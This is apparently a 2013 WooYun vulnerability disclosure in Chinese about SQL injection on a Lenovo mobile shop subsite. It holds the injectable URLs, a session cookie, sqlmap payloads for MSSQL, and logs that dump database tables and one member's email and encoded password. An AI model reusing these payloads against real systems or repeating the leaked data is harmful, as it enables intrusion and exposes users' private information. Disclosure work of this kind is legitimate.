当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035168

漏洞标题:联想安全问题四某分站再来两枚SQL注射(大量用户明文密码)

相关厂商:联想

漏洞作者: VIP

提交时间:2013-08-25 11:11

修复时间:2013-10-09 11:11

公开时间:2013-10-09 11:11

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-25: 细节已通知厂商并且等待厂商处理中
2013-08-26: 厂商已经确认,细节仅向厂商公开
2013-09-05: 细节向核心白帽子及相关领域专家公开
2013-09-15: 细节向普通白帽子公开
2013-09-25: 细节向实习白帽子公开
2013-10-09: 细节向公众公开

简要描述:

漏洞好多
PS:原来联想内部员工购买这么便宜,联想智能手机 A656卖1399,内购只要851;皮套卖149,内购只要34;保护壳卖55,内购只要9.5 内部团购比外面要便宜很多,价格水分真心大!

详细说明:

注射点:
1.http://ess.lenovomobile.com/shopLst.aspx?RackCode=A11
2.http://ess.lenovomobile.com/shopLst.aspx?PageSize=20&PageNum=1&OrderBy=PublishDate+Desc&EchoType=1&RackCode=A11
这两枚都要登录状态的,所以可能不容易被发现吧。
用这个cookie:ASP.NET_SessionId=h3t1sdbpwidnyd45y2ntf0ni (如果不行说明是失效了)

漏洞证明:

---
Place: GET
Parameter: RackCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: RackCode=A11' AND 9638=9638 AND 'NoGV'='NoGV
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: RackCode=A11' AND 9922=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR
(107)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9922=9922) THEN CHAR(49) ELSE CHAR
(48) END))+CHAR(113)+CHAR(99)+CHAR(109)+CHAR(104)+CHAR(113))) AND 'lmYB'='lmYB
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: RackCode=A11'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: RackCode=A11' WAITFOR DELAY '0:0:5'--
---


Database: lmshop
[89 tables]
+--------------------------+
| EssCarDtl |
| EssCarMst |
| EssCmpRegiForm |
| EssFavorites |
| EssGoods |
| EssGoodsColor |
| EssGoodsPresent |
| EssGoodsPrice_Log |
| EssMember |
| EssOrder |
| EssSales |
| EssSalesGoods |
| EssSalesMail |
| EssVerifyCode |
| JB_QuickLogin |
| MailBasSet |
| MailSet |
| MailTemplate |
| MailToDtl |
| MailToGrp |
| MstCode |
| MstCsErr |
| MstCsLog |
| MstCsMenu |
| MstCsUser |
| MstMenu |
| MstMessage |
| MstRole |
| MstRoleMenu |
| MstRoleUser |
| MstUser |
| PmtActivities |
| PmtAttach |
| PmtAttendance |
| PmtFee |
| PmtGoods |
| PmtImg |
| PmtImgSize |
| PmtOrder |
| PmtOrderWithDraw |
| PmtPromoter |
| PmtQA |
| PmtSettle |
| PmtSettleDtl |
| PmtSettleOrder |
| PmtSettleOrderTmp |
| PmtSettleSim |
| PmtSettleSimDtl |
| PmtVerifyCode |
| RECEIVE |
| SEND |
| SellBigOrder |
| SellCustomize |
| SellJoinEnterprise |
| SellJoinPerson |
| ShopCard |
| SmsBasSet |
| SmsClass |
| SmsDueSend |
| SmsDueSendRec |
| SmsNormalIF |
| SmsNormalIFCC111021 |
| SmsNormalIfRec |
| SmsReceive |
| SmsReceiveType |
| SmsSend |
| SmsSend100601 |
| SmsSend100602 |
| SmsSendRec |
| SmsSysSet |
| SmsTempIF |
| SmsTempIfRec |
| SmsTemplate |
| SmsUserRight |
| SmsWhiteBlackBill |
| TrnFeedback |
| TrnNews |
| V_EssGoodsPrice |
| V_GetPayTypeByDistrictID |
| V_OrderGoodsType |
| V_PmtFee |
| V_UserMenu |
| ZSmsNormalIF100601 |
| ZSmsNormalIF110916 |
| ZSmsNormalIF111018 |
| bakUp_LMmbrid |
| dtproperties |
| pangolin_test_table |
| sms.SmsNormalIFCC |
+--------------------------+


[13:58:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


[13:59:59] [INFO] fetching columns for table 'EssMember' in database 'lmshop'
[14:00:06] [INFO] the SQL query used returns 12 entries
[14:00:13] [INFO] retrieved: Email
[14:00:20] [INFO] retrieved: varchar
[14:00:27] [INFO] retrieved: IsValid
[14:00:34] [INFO] retrieved: nvarchar
[14:00:41] [INFO] retrieved: MbrID
[14:00:47] [INFO] retrieved: bigint
[14:00:54] [INFO] retrieved: MbrName
[14:01:00] [INFO] retrieved: varchar
[14:01:06] [INFO] retrieved: Password
[14:01:12] [INFO] retrieved: nvarchar
[14:01:19] [INFO] retrieved: Phone
[14:01:26] [INFO] retrieved: nvarchar
[14:01:33] [INFO] retrieved: RegDate
[14:01:39] [INFO] retrieved: datetime
[14:01:45] [INFO] retrieved: RegID
[14:01:51] [INFO] retrieved: nvarchar
[14:01:57] [INFO] retrieved: SalesCode
[14:02:02] [INFO] retrieved: varchar
[14:02:07] [INFO] retrieved: SalesID
[14:02:13] [INFO] retrieved: bigint
[14:02:18] [INFO] retrieved: UpdDate
[14:02:23] [INFO] retrieved: datetime
[14:02:29] [INFO] retrieved: UpdID
[14:02:35] [INFO] retrieved: nvarchar
[14:02:35] [INFO] fetching entries for table 'EssMember' in database 'lmshop'
[14:02:41] [INFO] retrieved: 8203
[14:02:41] [INFO] fetching number of distinct values for column 'Email'
[14:02:47] [INFO] retrieved: 8196
[14:02:47] [INFO] fetching number of distinct values for column 'MbrID'
[14:02:53] [INFO] retrieved: 8203
[14:02:53] [INFO] using column 'MbrID' as a pivot for retrieving row data
[14:02:59] [INFO] retrieved: 1
[14:03:05] [INFO] retrieved: lihe@cmbchina.com
[14:03:10] [INFO] retrieved:
[14:03:16] [INFO] retrieved:
[14:03:22] [INFO] retrieved:
[14:03:27] [INFO] retrieved: 1
[14:03:34] [INFO] retrieved: lihe
[14:03:40] [INFO] retrieved: 05 20 2009 11:27AM
[14:03:46] [INFO] retrieved: 1
[14:03:52] [INFO] retrieved: 05 20 2009 11:27AM
[14:03:57] [INFO] retrieved: FE24W1UJNg1QedCl+4dKFw==


密码是base64有木有!!!这和明文有什么区别!!!

修复方案:

过滤啊

版权声明:转载请注明来源 VIP@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-08-26 01:33

厂商回复:

感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-26 02:35 | Sct7p ( 实习白帽子 | Rank:62 漏洞数:9 | 懂与不懂之间只隔了一层纸,懂的人会觉得很...)

    /././刷rank的节奏

  2. 2013-08-26 08:39 | 肥猪 ( 路人 | Rank:0 漏洞数:1 | 无)

    我是看明白了两项联想的面目